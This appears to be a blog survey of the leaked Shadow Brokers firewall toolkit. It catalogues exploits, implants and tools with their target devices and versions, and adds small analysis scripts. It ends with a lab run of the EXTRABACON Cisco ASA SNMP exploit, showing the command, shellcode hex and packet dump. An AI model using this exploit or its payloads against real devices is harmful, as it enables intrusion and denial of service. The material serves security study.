CONTAINMENTGRID A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version tos_3.

GOTHAMKNIGHT A payload for the ELIGIBLEBOMBSHELL TOPSEC firewall exploit affecting version Has no BLATSTING support.

ELIGIBLECANDIDATE A remote code execution exploit for TOPSEC firewalls that exploits an HTTP cookie command injection vulnerability, affecting versions to

ELIGIBLECONTESTANT A remote code execution exploit for TOPSEC firewalls that exploits an HTTP POST parameter injection vulnerability, affecting versions to This exploit can be tried after ELIGIBLECANDIDATE.

EPICBANANA A privilege escalation exploit against Cisco Adaptive Security Appliance (ASA) and Cisco Private Internet eXchange (PIX) devices. Exploitation takes advantage of default Cisco credentials (password: cisco). Affects ASA versions 711, 712, 721, 722, 723, 724, 80432, 804, 805, 822, 823, 824, 825, 831, 832 and PIX versions 711, 712, 721, 722, 723, 724, 804.

ESCALATEPLOWMAN A privilege escalation exploit against WatchGuard firewalls of unknown versions that injects code via the ifconfig command.

EXTRABACON A remote code execution exploit against Cisco Adaptive Security Appliance (ASA) devices affecting ASA versions 802, 803, 804, 805, 821, 822, 823, 824, 825, 831, 832, 841, 842, 843, 844. It exploits an overflow vulnerability using the Simple Network Management Protocol (SNMP) and relies on knowing the target's uptime and software version.
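
For anyone who wants to check their own devices against the list above, here is a minimal Python sketch. It assumes that the compact numbers in the list correspond to dotted Cisco version strings with the punctuation removed (for example "8.0(3)" becoming "803"); that mapping and the helper names `compact_version` and `is_listed` are my assumptions, not something stated in the leak notes.

```python
import re

# Affected ASA versions exactly as listed in the EXTRABACON entry above.
EXTRABACON_VERSIONS = {
    "802", "803", "804", "805", "821", "822", "823", "824",
    "825", "831", "832", "841", "842", "843", "844",
}

def compact_version(version):
    """Turn a dotted string such as '8.0(3)' into the compact form '803'.

    Assumption: the compact form is simply every digit group joined together.
    """
    return "".join(re.findall(r"\d+", version))

def is_listed(version):
    """Return True if the version appears in the EXTRABACON list above."""
    return compact_version(version) in EXTRABACON_VERSIONS

print(is_listed("8.0(3)"))  # True
print(is_listed("9.1(2)"))  # False
```

The check only tells whether a version appears in the list; it says nothing about whether versions outside the list are safe.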

BOOKISHMUTE An exploit against an unknown firewall using Red Hat 6.0.

FALSEMOREL Allows for the deduction of the "enable" password from data freely offered by an unspecified firewall (likely Cisco) and obtains privileged level access using only the hash of the "enable" password. Requires telnet to be installed on the firewall's inside interface.

Cisco exploits by vulnerabilities:

Cisco Admits Unknown Vulnerabilities


The following is a list of the implants found in the leaked dump.

BLATSTING A firewall software implant that is used with EGREGIOUSBLUNDER (Fortigate) and ELIGIBLEBACHELOR (TOPSEC). 

BANANAGLEE A non-persistent firewall software implant for Cisco ASA and PIX devices that is installed by writing the implant directly to memory. Also mentioned in the previously leaked NSA ANT catalogue. 

BANANABALLOT A BIOS module associated with an implant (likely BANANAGLEE). 

BEECHPONY A firewall implant that is a predecessor of BANANAGLEE. 

JETPLOW A firmware persistence implant for Cisco ASA and PIX devices that persists BANANAGLEE. Also mentioned in the previously leaked NSA ANT catalogue.
JETPLOW evidence on leaked USA Secret Documents


BARGLEE A firewall software implant. Unknown vendor. 

BUZZDIRECTION A firewall software implant for Fortigate firewalls. 

FEEDTROUGH A technique for persisting BANANAGLEE and ZESTYLEAK implants for Juniper NetScreen firewalls. Also mentioned in the previously leaked NSA ANT catalogue. 

JIFFYRAUL A module loaded into Cisco PIX firewalls with BANANAGLEE. 

BANNANADAIQUIRI An implant associated with SCREAMINGPLOW. Yes, banana is spelled with three Ns this time. 

POLARPAWS A firewall implant. Unknown vendor. 

POLARSNEEZE A firewall implant. Unknown vendor. 

ZESTYLEAK A firewall software implant for Juniper NetScreen firewalls that is also listed as a module for BANANAGLEE. Also mentioned in the previously leaked NSA ANT catalogue. 

SECONDDATE A packet injection module for BANANAGLEE and BARGLEE. 

BARPUNCH A module for BANANAGLEE and BARGLEE implants. 

BBALL A module for BANANAGLEE implants.

BBALLOT A module for BANANAGLEE implants. 

BBANJO A module for BANANAGLEE implants. 

BCANDY A module for BANANAGLEE implants.  

BFLEA A module for BANANAGLEE implants. 

BMASSACRE A module for BANANAGLEE and BARGLEE implants. 

BNSLOG A module for BANANAGLEE and BARGLEE implants. 

BPATROL A module for BANANAGLEE implants. 

BPICKER A module for BANANAGLEE implants. 

BPIE A module for BANANAGLEE and BARGLEE implants. 

BUSURPER A module for BANANAGLEE implants. 

CLUCKLINE A module for BANANAGLEE implants.


The following is a list of the tools found in the leaked dump.

BILLOCEAN Retrieves the serial number of a firewall, to be recorded in operation notes. Used in conjunction with EGREGIOUSBLUNDER for Fortigate firewalls.

FOSHO A Python library for creating HTTP exploits.

BARICE A tool that provides a shell for installing the BARGLEE implant.

DURABLENAPKIN A tool for injecting packets on LANs.

BANANALIAR A tool for connecting to an unspecified implant (likely BANANAGLEE).

PANDAROCK A tool for connecting to a POLARPAWS implant.

TURBOPANDA A tool that can be used to communicate with a HALLUXWATER implant. Also mentioned in the previously leaked NSA ANT catalogue.

TEFLONDOOR A self-destructing post-exploitation shell for executing an arbitrary file. The arbitrary file is first encrypted with a key.

1212/DEHEX Converts hexadecimal strings to IP addresses and ports.
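
This kind of conversion is easy to picture with a minimal Python sketch. The input format is an assumption on my side (8 hex digits for an IPv4 address in network byte order, optionally followed by 4 hex digits for the port), and the `dehex` function below is a hypothetical helper, not the code of the leaked tool.

```python
import ipaddress

def dehex(value):
    """Decode 8 hex digits as an IPv4 address, plus 4 optional hex digits as a port."""
    value = value.strip().lower()
    if value.startswith("0x"):
        value = value[2:]
    raw = bytes.fromhex(value)
    if len(raw) not in (4, 6):
        raise ValueError("expected 8 hex digits (IP) or 12 hex digits (IP and port)")
    ip = str(ipaddress.IPv4Address(raw[:4]))  # first 4 bytes: address, big-endian
    port = int.from_bytes(raw[4:], "big") if len(raw) == 6 else None
    return ip, port

print(dehex("c0a8010a01bb"))  # ('192.168.1.10', 443)
```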

XTRACTPLEASING Extracts something from a file and produces a PCAP file as output.

NOPEN A post-exploitation shell consisting of a client and a server that encrypts data using RC6. The server is installed on the target machine.

BENIGNCERTAIN A tool that appears to be for sending certain types of Internet Key Exchange (IKE) packets to a remote host and parsing the response.


Here is an example run of the EXTRABACON exploit, to check whether it works in my lab environment as well.

 mr@mrtestbox:~$ ./ exec -k F_RlDw -v -t -c cisco --mode pass-enable  
 WARNING: No route found for IPv6 destination :: (no default route?)  
 Logging to /home/marcoramilli/concernedparent  
 [+] Executing: ./ exec -k F_RlDw -v -t -c cisco --mode pass-enable  
 [+] running from /home/marcoramilli  
 Data stored in self.vinfo: ASA803  
 [+] generating exploit for exec mode pass-enable  
 [+] using shellcode in ./versions  
 [+] importing version-specific shellcode shellcode_asa803  
 [+] building payload for mode pass-enable  
 appended PMCHECK_ENABLE payload eb14bf7082090931c9b104fcf3a4e92f0000005e  
 appended AAAADMINAUTH_ENABLE payload eb14bfb060060831c9b104fcf3a4e92f0000005eebece8f8ffffff5  
 [+] random SNMP request-id 425297185  
 [+] fixing offset to payload 49  
 overflow (112):  
 *** output omitted ****  
 payload (133): eb14bf7082090931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531  
 EXBA msg (371): 3082016f0201010405636973636fa58201610204195985210201000201013082015130819106072b0601020101010  
 *** output omitted ****  
 [+] Connecting to  
 [+] packet 1 of 1  
 [+] 0000 30 82 01 6F 02 01 01 04 05 63 69 73 63 6F A5 82  
 [+] 0010 01 61 02 04 19 59 85 21 02 01 00 02 01 01 30 82 .a...Y.!......0.  
 [+] 0020 01 51 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .Q0....+........  
 [+] 0030 85 EB 14 BF 70 82 09 09 31 C9 B1 04 FC F3 A4 E9 ....p...1.......  
 [+] 0040 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 31 C0 89 /...^.......U1..  
 [+] 0050 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 AC ..........1...%.  
 [+] 0060 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 A5 31 .1......1......1  
 [+] 0070 FA CD 80 EB 14 BF B0 60 06 08 31 C9 B1 04 FC F3 .......`..1.....  
 [+] 0080 A4 E9 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 89 ../...^.......U.  
 ###[ SNMP ]###  
 version = v2c  
 community = 'cisco'  
 \PDU \  
 |###[ SNMPbulk ]###  
 | id = <ASN1_INTEGER[425297185]>  
 | non_repeaters= 0  
 | max_repetitions= 1  
 | \varbindlist\  
 | |###[ SNMPvarbind ]###  
 | | oid = <ASN1_OID['.']>  
 | | value = <ASN1_STRING['\xeb\x14\xbfp\x82\t\t1\xc9\xb1\x04\xfc\xf3\xa4\xe9/\x00  
  *** output omitted ****  
 | |###[ SNMPvarbind ]###  
 | | oid = <ASN1_OID['.  
  *** output omitted ****']>  
 | | value = <ASN1_NULL[0]>  
 [-] timeout waiting for response - performing health check  
 [-] no response from health check - target may have crashed  
 [-] health check failed  
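
The first bytes of the hex dump above can be decoded by hand, since an SNMP message is just nested BER tag-length-value fields. Here is a minimal Python sketch that parses only the message header; the bytes are copied from the first two rows of the dump, while the helper names (`read_tlv`, `read_int`, `parse_snmp_header`) are mine and the parser deliberately ignores everything after the three PDU integers.

```python
def read_tlv(buf, pos):
    """Read one BER tag and length at pos; return (tag, length, value_start)."""
    tag = buf[pos]
    length = buf[pos + 1]
    pos += 2
    if length & 0x80:  # long form: low 7 bits give the number of length bytes
        count = length & 0x7F
        length = int.from_bytes(buf[pos:pos + count], "big")
        pos += count
    return tag, length, pos

def read_int(buf, pos):
    """Read a BER INTEGER (treated as unsigned for simplicity)."""
    tag, length, pos = read_tlv(buf, pos)
    if tag != 0x02:
        raise ValueError("expected INTEGER tag 0x02")
    return int.from_bytes(buf[pos:pos + length], "big"), pos + length

def parse_snmp_header(msg):
    """Decode version, community and the first three PDU integers."""
    tag, body_len, pos = read_tlv(msg, 0)  # outer SEQUENCE
    if tag != 0x30:
        raise ValueError("expected SEQUENCE tag 0x30")
    total_len = pos + body_len  # header bytes plus declared body length
    version, pos = read_int(msg, pos)
    tag, length, pos = read_tlv(msg, pos)  # community OCTET STRING
    community = msg[pos:pos + length].decode("ascii")
    pos += length
    pdu_tag, _pdu_len, pos = read_tlv(msg, pos)
    request_id, pos = read_int(msg, pos)
    non_repeaters, pos = read_int(msg, pos)
    max_repetitions, pos = read_int(msg, pos)
    return {
        "total_len": total_len,
        "version": version,  # 1 means SNMP v2c
        "community": community,
        "pdu_tag": pdu_tag,  # 0xA5 is a GetBulkRequest
        "request_id": request_id,
        "non_repeaters": non_repeaters,
        "max_repetitions": max_repetitions,
    }

# First 30 bytes of the packet, copied from the hex dump above.
HEADER = bytes.fromhex("3082016f0201010405636973636fa5820161020419598521020100020101")
print(parse_snmp_header(HEADER))
```

The decoded values line up with the rest of the output: a total length of 371 bytes, version v2c, community 'cisco', a bulk request with request-id 425297185, non_repeaters 0 and max_repetitions 1.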


Most of the sources I used for this survey: Musalbas, Packet Storm, ExploitDB, Cisco, Schneier